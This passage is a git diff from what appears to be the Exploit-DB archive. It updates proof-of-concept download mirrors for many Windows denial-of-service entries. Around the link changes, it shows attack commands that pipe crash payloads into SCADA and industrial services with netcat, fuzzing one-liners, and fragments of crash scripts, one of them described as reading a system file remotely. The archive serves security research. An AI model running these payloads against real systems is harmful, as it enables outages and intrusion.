-https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-2.zip (realwin_2.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-2.zip (realwin_2.zip) nc SERVER 910 < realwin_2.dat @@ -89,7 +89,7 @@ The Code =========== http://aluigi.org/poc/realwin_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-3.zip (realwin_3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-3.zip (realwin_3.zip) nc SERVER 910 < realwin_3?.dat @@ -113,7 +113,7 @@ The Code =========== http://aluigi.org/poc/realwin_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-4.zip (realwin_4.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-4.zip (realwin_4.zip) nc SERVER 910 < realwin_4.dat @@ -151,7 +151,7 @@ The Code =========== http://aluigi.org/poc/realwin_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-5.zip (realwin_5.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-5.zip (realwin_5.zip) nc SERVER 910 < realwin_5?.dat @@ -186,7 +186,7 @@ The Code =========== http://aluigi.org/poc/realwin_6.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-6.zip (realwin_6.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-6.zip (realwin_6.zip) nc SERVER 910 < realwin_6?.dat @@ -227,7 +227,7 @@ The Code =========== http://aluigi.org/poc/realwin_7.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-7.zip (realwin_7.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-7.zip (realwin_7.zip) nc SERVER 910 < realwin_7?.dat @@ -251,7 +251,7 @@ The Code =========== http://aluigi.org/poc/realwin_8.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-8.zip (realwin_8.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-8.zip (realwin_8.zip) nc SERVER 910 < realwin_8.dat diff --git a/exploits/windows/dos/17032.txt b/exploits/windows/dos/17032.txt index bb6429c3a..8af8bd8fe 100644 --- a/exploits/windows/dos/17032.txt +++ b/exploits/windows/dos/17032.txt @@ -62,4 +62,4 @@ Exception was not handled by user's code, so application was forced to close 78138A19 Main PUSH C000000D ; ESP=0012E4D8 78138A1E Main CALL DWORD PTR DS:[<&KERNEL32.GetCurrentProcess>]; FL=PS, EAX=FFFFFFFF 78138A24 Main PUSH EAX ; ESP=0012E4D4 -78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, +78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70, \ No newline at end of file diff --git a/exploits/windows/dos/17045.py b/exploits/windows/dos/17045.py index 60f0c0ff7..26e2324b9 100755 --- a/exploits/windows/dos/17045.py +++ b/exploits/windows/dos/17045.py @@ -20,4 +20,4 @@ crash = "A" * 2000 print "Sending crash...." pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00" -s.sendto(pwned, (host, port)) +s.sendto(pwned, (host, port)) \ No newline at end of file diff --git a/exploits/windows/dos/17071.py b/exploits/windows/dos/17071.py index 9a27b026f..0c7c82f65 100755 --- a/exploits/windows/dos/17071.py +++ b/exploits/windows/dos/17071.py @@ -18,6 +18,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" - - +print "Play this file with GOM Player 2.1.28.5039 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17074.py b/exploits/windows/dos/17074.py index 8640a1a60..733973f3c 100755 --- a/exploits/windows/dos/17074.py +++ b/exploits/windows/dos/17074.py @@ -35,6 +35,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with Winamp 5.61 and enjoy ;)" - - +print "Play this file with Winamp 5.61 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17075.py b/exploits/windows/dos/17075.py index ad9662baa..e0c6615e9 100755 --- a/exploits/windows/dos/17075.py +++ b/exploits/windows/dos/17075.py @@ -28,6 +28,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" - - +print "Play this file with Media Player Classic - Home Cinema 1.5.0.2827 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/1708.txt b/exploits/windows/dos/1708.txt index 490bd658e..b6b4cf023 100644 --- a/exploits/windows/dos/1708.txt +++ b/exploits/windows/dos/1708.txt @@ -16,6 +16,6 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1708.zip (04232006-skulltagfs.zip) +Backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1708.zip (04232006-skulltagfs.zip) # milw0rm.com [2006-04-23] \ No newline at end of file diff --git a/exploits/windows/dos/17142.py b/exploits/windows/dos/17142.py index f6e0a26d2..fdcad6667 100755 --- a/exploits/windows/dos/17142.py +++ b/exploits/windows/dos/17142.py @@ -39,6 +39,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Open this file in IrfanView 4.28 and enjoy ;)" - - +print "Open this file in IrfanView 4.28 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17143.py b/exploits/windows/dos/17143.py index 274449540..1fc9b9e25 100755 --- a/exploits/windows/dos/17143.py +++ b/exploits/windows/dos/17143.py @@ -39,6 +39,4 @@ f.write(poc) f.close() print "Done, 1 file generated on 'C:\\' ..." -print "Open this file in IrfanView 4.28 and enjoy ;)" - - +print "Open this file in IrfanView 4.28 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17159.txt b/exploits/windows/dos/17159.txt index 6031ba6be..7985b1fd3 100644 --- a/exploits/windows/dos/17159.txt +++ b/exploits/windows/dos/17159.txt @@ -202,7 +202,7 @@ K (maybe)] http://aluigi.org/poc/snabase_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17159.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17159.zip A] nc SERVER PORT < snabase_1a.dat diff --git a/exploits/windows/dos/17160.txt b/exploits/windows/dos/17160.txt index e6980a18c..b0b8180e9 100644 --- a/exploits/windows/dos/17160.txt +++ b/exploits/windows/dos/17160.txt @@ -143,7 +143,7 @@ vulnerabilities reported in this software. http://aluigi.org/poc/msreader_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17160.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17160.zip ####################################################################### diff --git a/exploits/windows/dos/17161.txt b/exploits/windows/dos/17161.txt index 28959849d..68f17cfe4 100644 --- a/exploits/windows/dos/17161.txt +++ b/exploits/windows/dos/17161.txt @@ -124,7 +124,7 @@ Modified bytes for msreader_2b.lit: http://aluigi.org/poc/msreader_2.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17161.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17161.zip ####################################################################### diff --git a/exploits/windows/dos/17162.txt b/exploits/windows/dos/17162.txt index 0d4052e8f..6326634bd 100644 --- a/exploits/windows/dos/17162.txt +++ b/exploits/windows/dos/17162.txt @@ -141,7 +141,7 @@ sequence of 'A's. http://aluigi.org/poc/msreader_3.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17162.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17162.zip ####################################################################### diff --git a/exploits/windows/dos/17163.txt b/exploits/windows/dos/17163.txt index 363a2eded..d2d3f1d7a 100644 --- a/exploits/windows/dos/17163.txt +++ b/exploits/windows/dos/17163.txt @@ -101,7 +101,7 @@ Modified bytes in the proof-of-concept: http://aluigi.org/poc/msreader_4.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17163.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17163.zip ####################################################################### diff --git a/exploits/windows/dos/17164.txt b/exploits/windows/dos/17164.txt index e514d63da..d7c33df55 100644 --- a/exploits/windows/dos/17164.txt +++ b/exploits/windows/dos/17164.txt @@ -100,7 +100,7 @@ Modified bytes in the proof-of-concept: http://aluigi.org/poc/msreader_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17164.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17164.zip ####################################################################### diff --git a/exploits/windows/dos/17274.txt b/exploits/windows/dos/17274.txt index 713e6aad7..7360635ba 100644 --- a/exploits/windows/dos/17274.txt +++ b/exploits/windows/dos/17274.txt @@ -119,4 +119,4 @@ SlimPDF_Reader+0x00000000000419c4 (Hash=0x566e1f14.0x18331e13) User mode write access violations that are not near NULL are exploitable. -POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17274.poc.tar.gz \ No newline at end of file +POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17274.poc.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/17287.mid b/exploits/windows/dos/17287.mid index d5dfb6348..4fb43d0dc 100644 --- a/exploits/windows/dos/17287.mid +++ b/exploits/windows/dos/17287.mid @@ -177,4 +177,4 @@ VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVQ== -POC Available: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17287.poc.mid \ No newline at end of file +POC Available: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17287.poc.mid \ No newline at end of file diff --git a/exploits/windows/dos/17398.txt b/exploits/windows/dos/17398.txt index 33f9d4e4f..f33f7b0a2 100644 --- a/exploits/windows/dos/17398.txt +++ b/exploits/windows/dos/17398.txt @@ -15,7 +15,7 @@ playlist and the media player will try to generate thumbnail image of the contents. File at: http://www.deventum.com/research/Crash_WMplayer.3gp -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17398.3gp (Crash_WMplayer.3gp) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17398.3gp (Crash_WMplayer.3gp) Debug info, diff --git a/exploits/windows/dos/17399.txt b/exploits/windows/dos/17399.txt index b992b75cd..b8e3a6ed2 100644 --- a/exploits/windows/dos/17399.txt +++ b/exploits/windows/dos/17399.txt @@ -85,5 +85,5 @@ winword!wdGetApplicationObject+0x150fac: 4) POC =========== -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17399.doc (PRL-2011-07.doc) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17399.doc (PRL-2011-07.doc) http://www.protekresearchlab.com/exploits/PRL-2011-07.doc \ No newline at end of file diff --git a/exploits/windows/dos/17405.txt b/exploits/windows/dos/17405.txt index 82d535ab4..a0cb4a3ec 100644 --- a/exploits/windows/dos/17405.txt +++ b/exploits/windows/dos/17405.txt @@ -25,4 +25,4 @@ The following JS was the problem point inside the PDF file (Open the PoC file by dirty; // Important! /*****************************************************************************/ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17405.pdf \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17405.pdf \ No newline at end of file diff --git a/exploits/windows/dos/17421.py b/exploits/windows/dos/17421.py index dd03279af..2b6263bd0 100755 --- a/exploits/windows/dos/17421.py +++ b/exploits/windows/dos/17421.py @@ -44,4 +44,4 @@ f.write(poc) f.close() print "Done, 2nd file generated on 'C:\\' ..." -print "Open this file in XnView 1.98 and enjoy ;)" +print "Open this file in XnView 1.98 and enjoy ;)" \ No newline at end of file diff --git a/exploits/windows/dos/17497.txt b/exploits/windows/dos/17497.txt index cfc4faa0a..8e66858f8 100644 --- a/exploits/windows/dos/17497.txt +++ b/exploits/windows/dos/17497.txt @@ -43,4 +43,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5023.php PoC: - http://www.zeroscience.mk/codes/alplayer_bof.rar - - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17497.rar (alplayer_bof.rar) \ No newline at end of file + - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17497.rar (alplayer_bof.rar) \ No newline at end of file diff --git a/exploits/windows/dos/17544.txt b/exploits/windows/dos/17544.txt index 5bbed7b96..ef647b1a6 100644 --- a/exploits/windows/dos/17544.txt +++ b/exploits/windows/dos/17544.txt @@ -166,4 +166,4 @@ corruptions using a standalone file. . feel free to contact us at : info [at] abysssec.com PoC link : http://abysssec.com/files/GDI_PoC.zip -PoC Mirror : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17544.zip (GDI_PoC.zip) \ No newline at end of file +PoC Mirror : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17544.zip (GDI_PoC.zip) \ No newline at end of file diff --git a/exploits/windows/dos/17712.txt b/exploits/windows/dos/17712.txt index 8311be3a6..5cf658d8a 100644 --- a/exploits/windows/dos/17712.txt +++ b/exploits/windows/dos/17712.txt @@ -79,4 +79,4 @@ the memory is corrupted and arbitrary code can be run on the remote host. =========== http://www.protekresearchlab.com/exploits/PRL-2011-08.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17712.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17712.zip \ No newline at end of file diff --git a/exploits/windows/dos/17772.txt b/exploits/windows/dos/17772.txt index 871c8fba3..4249f2e06 100644 --- a/exploits/windows/dos/17772.txt +++ b/exploits/windows/dos/17772.txt @@ -69,7 +69,7 @@ fwrite(). http://aluigi.org/poc/bwocxrun_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17772.zip (bwocxrun_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17772.zip (bwocxrun_1.zip) ####################################################################### diff --git a/exploits/windows/dos/17795.py b/exploits/windows/dos/17795.py index d2d6c4c10..44016e10b 100755 --- a/exploits/windows/dos/17795.py +++ b/exploits/windows/dos/17795.py @@ -44,6 +44,4 @@ print (r) s.send(cmd + " " + data1 + data2 + '\r\n') print ("Payload Send!\n") print ("2 or 3 seconds before the blue screen of the death...") -s.close() - - +s.close() \ No newline at end of file diff --git a/exploits/windows/dos/1781.txt b/exploits/windows/dos/1781.txt index ecde19d33..393a7413f 100644 --- a/exploits/windows/dos/1781.txt +++ b/exploits/windows/dos/1781.txt @@ -1,5 +1,5 @@ # Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1781.zip (05132006-outgunx.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1781.zip (05132006-outgunx.zip) # milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/exploits/windows/dos/1782.txt b/exploits/windows/dos/1782.txt index 999854928..00c47b475 100644 --- a/exploits/windows/dos/1782.txt +++ b/exploits/windows/dos/1782.txt @@ -1,5 +1,5 @@ # Empire <= 4.3.2 (strncat) Denial of Service Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1782.zip (05132006-empiredos.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1782.zip (05132006-empiredos.zip) # milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/exploits/windows/dos/1783.txt b/exploits/windows/dos/1783.txt index c536de306..899b9c034 100644 --- a/exploits/windows/dos/1783.txt +++ b/exploits/windows/dos/1783.txt @@ -1,5 +1,5 @@ # Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1783.zip (05132006-genecysbof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1783.zip (05132006-genecysbof.zip) # milw0rm.com [2006-05-14] \ No newline at end of file diff --git a/exploits/windows/dos/17830.txt b/exploits/windows/dos/17830.txt index b2661f8c1..3e4a3a5df 100644 --- a/exploits/windows/dos/17830.txt +++ b/exploits/windows/dos/17830.txt @@ -208,7 +208,7 @@ flow and executing code under SYSTEM privileges. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17830.zip (udpsz.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17830.zip (udpsz.zip) udpsz -C 00140004 -b a -l 0 -T 0xffffffff SERVER 42 0x140008 diff --git a/exploits/windows/dos/17835.txt b/exploits/windows/dos/17835.txt index 8f6720215..2482a7848 100644 --- a/exploits/windows/dos/17835.txt +++ b/exploits/windows/dos/17835.txt @@ -54,7 +54,7 @@ Denial of Service caused by an invalid read access. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17835.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17835.zip udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe diff --git a/exploits/windows/dos/17836.txt b/exploits/windows/dos/17836.txt index 91b6161bf..12110dea7 100644 --- a/exploits/windows/dos/17836.txt +++ b/exploits/windows/dos/17836.txt @@ -68,7 +68,7 @@ Modified bytes: http://aluigi.org/poc/metastock_1.mwl -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17836.mwl +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17836.mwl ####################################################################### diff --git a/exploits/windows/dos/17837.txt b/exploits/windows/dos/17837.txt index 1c583fb66..3f8bd2c41 100644 --- a/exploits/windows/dos/17837.txt +++ b/exploits/windows/dos/17837.txt @@ -87,7 +87,7 @@ or http://aluigi.org/poc/esignal_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17837.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17837.zip ####################################################################### diff --git a/exploits/windows/dos/17838.txt b/exploits/windows/dos/17838.txt index 004d9fd77..8aaa31f2b 100644 --- a/exploits/windows/dos/17838.txt +++ b/exploits/windows/dos/17838.txt @@ -64,7 +64,7 @@ exploitable through the "domain", "report_domain", "register_datahub", http://aluigi.org/poc/cogent_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17838.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17838.dat nc SERVER 4052 < cogent_1.dat diff --git a/exploits/windows/dos/17839.txt b/exploits/windows/dos/17839.txt index 66295a126..9eb413fdb 100644 --- a/exploits/windows/dos/17839.txt +++ b/exploits/windows/dos/17839.txt @@ -55,7 +55,7 @@ field (-1 or 4294967295) plus one resulting in a buffer of zero bytes. http://aluigi.org/poc/cogent_3.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17839.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17839.dat nc SERVER 80 < cogent_3.dat diff --git a/exploits/windows/dos/1784.txt b/exploits/windows/dos/1784.txt index 2b8770f43..5b8c4122e 100644 --- a/exploits/windows/dos/1784.txt +++ b/exploits/windows/dos/1784.txt @@ -1,3 +1,3 @@ # Raydium <= SVN 309 Multiple Remote Vulnerabilities Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1784.zip (05132006-raydiumx.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1784.zip (05132006-raydiumx.zip) \ No newline at end of file diff --git a/exploits/windows/dos/17841.txt b/exploits/windows/dos/17841.txt index 2380ea204..f8a5ef081 100644 --- a/exploits/windows/dos/17841.txt +++ b/exploits/windows/dos/17841.txt @@ -73,7 +73,7 @@ malicious code: http://aluigi.org/poc/daqfactory_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17841.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17841.dat nc SERVER 20034 -u < daqfactory_1.dat diff --git a/exploits/windows/dos/17842.txt b/exploits/windows/dos/17842.txt index b3eab8b08..8ff154344 100644 --- a/exploits/windows/dos/17842.txt +++ b/exploits/windows/dos/17842.txt @@ -56,7 +56,7 @@ through "memcpy(heap_buffer, input, content_length_size)". http://aluigi.org/poc/movicon_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17842-1.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-1.dat nc SERVER 808 < movicon_1.dat @@ -83,7 +83,7 @@ buffer of 8192 bytes for containing the incoming HTTP requests. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17842-2.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-2.dat udpsz -T -b 0x61 SERVER 808 10000 @@ -117,7 +117,7 @@ environments. http://aluigi.org/poc/movicon_3.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17842-3.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17842-3.dat nc SERVER 808 < movicon_3.dat diff --git a/exploits/windows/dos/17843.txt b/exploits/windows/dos/17843.txt index 1f6f9cdce..0e1b00ffc 100644 --- a/exploits/windows/dos/17843.txt +++ b/exploits/windows/dos/17843.txt @@ -58,7 +58,7 @@ overflow and invalid read access. http://aluigi.org/poc/rslogix_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17843.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17843.zip nc SERVER 4446 < rslogix_1a.dat nc SERVER 4446 < rslogix_1b.dat diff --git a/exploits/windows/dos/17844.txt b/exploits/windows/dos/17844.txt index 95eea58a2..08552e6a8 100644 --- a/exploits/windows/dos/17844.txt +++ b/exploits/windows/dos/17844.txt @@ -126,7 +126,7 @@ for executing any desired custom command. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17844-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-1.zip only a simple scanner: udpsz -d 2 -c "xx%" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000 @@ -134,7 +134,7 @@ only a simple scanner: udpsz -d 2 -c "xx%test," -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000 http://aluigi.org/poc/scadapro_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17844-2.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-2.zip nc SERVER 11234 < scadapro_1b.dat ; read c:\boot.ini nc SERVER 11234 < scadapro_1c.dat ; create c:\evil_file.txt diff --git a/exploits/windows/dos/17878.txt b/exploits/windows/dos/17878.txt index bf89b2480..d4f3bfbd2 100644 --- a/exploits/windows/dos/17878.txt +++ b/exploits/windows/dos/17878.txt @@ -118,7 +118,7 @@ comparison. http://aluigi.org/poc/eviews_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17878.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17878.zip ####################################################################### diff --git a/exploits/windows/dos/17879.txt b/exploits/windows/dos/17879.txt index b6a49f9ef..91913f75c 100644 --- a/exploits/windows/dos/17879.txt +++ b/exploits/windows/dos/17879.txt @@ -71,7 +71,7 @@ Various invalid memory accesses and freezing of the program. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17879.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip A] udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff diff --git a/exploits/windows/dos/17885.txt b/exploits/windows/dos/17885.txt index acbe810ce..80284ae71 100644 --- a/exploits/windows/dos/17885.txt +++ b/exploits/windows/dos/17885.txt @@ -238,7 +238,7 @@ effect. http://aluigi.org/testz/udpsz.zip (version 0.3.3) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17885-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17885-1.zip A] udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400 @@ -255,7 +255,7 @@ C] D] http://aluigi.org/poc/yrwxls_1.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17885-2.zip + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17885-2.zip E] udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff diff --git a/exploits/windows/dos/17889.txt b/exploits/windows/dos/17889.txt index d786cfe3c..4aadad4b8 100644 --- a/exploits/windows/dos/17889.txt +++ b/exploits/windows/dos/17889.txt @@ -89,7 +89,7 @@ integer overflow vulnerability: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17889.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17889.zip udpsz -b a -T -c "1=4294967279~2=0~" SERVER PORT 0xffff diff --git a/exploits/windows/dos/17896.txt b/exploits/windows/dos/17896.txt index 44737d895..c8fedd0f0 100644 --- a/exploits/windows/dos/17896.txt +++ b/exploits/windows/dos/17896.txt @@ -105,7 +105,7 @@ aipgctl.ocx (083B40D3-CCBA-11D2-AFE0-00C04F7993D6): http://aluigi.org/poc/pcvue_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17896.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17896.zip ####################################################################### diff --git a/exploits/windows/dos/17903.txt b/exploits/windows/dos/17903.txt index 1c5f04cbd..0f6c1625f 100644 --- a/exploits/windows/dos/17903.txt +++ b/exploits/windows/dos/17903.txt @@ -64,7 +64,7 @@ and all the operations like the above one. http://aluigi.org/poc/ncss_1.s0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17903.s0 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17903.s0 the 16bit value for EDX is located at offset 0x8bd. diff --git a/exploits/windows/dos/17918.txt b/exploits/windows/dos/17918.txt index 3320413da..65784d315 100644 --- a/exploits/windows/dos/17918.txt +++ b/exploits/windows/dos/17918.txt @@ -114,4 +114,4 @@ REF #2: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4940.php Proof Of Concept: ----------------- http://www.zeroscience.mk/codes/brush_gradiently.rar (11071 bytes) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17918.rar (brush_gradiently.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17918.rar (brush_gradiently.rar) \ No newline at end of file diff --git a/exploits/windows/dos/1792.txt b/exploits/windows/dos/1792.txt index 7ef41a859..b0de0c742 100644 --- a/exploits/windows/dos/1792.txt +++ b/exploits/windows/dos/1792.txt @@ -1,3 +1,3 @@ # GNUnet <= 0.7.0d (Empty UDP Packet) Remote Denial of Service Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1792.zip (05152006-udpsz.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1792.zip (05152006-udpsz.zip) \ No newline at end of file diff --git a/exploits/windows/dos/17929.txt b/exploits/windows/dos/17929.txt index d626d03d1..fec402fda 100644 --- a/exploits/windows/dos/17929.txt +++ b/exploits/windows/dos/17929.txt @@ -95,7 +95,7 @@ Poc in HTML File: http://pastebin.com/DBUGWbQM The PDF file needed can be found here: http://www.irs.gov/pub/irs-pdf/fw4.pdf Download both files here: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17929.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17929.zip ----------------Steps to Reproduce---------------- diff --git a/exploits/windows/dos/17930.txt b/exploits/windows/dos/17930.txt index 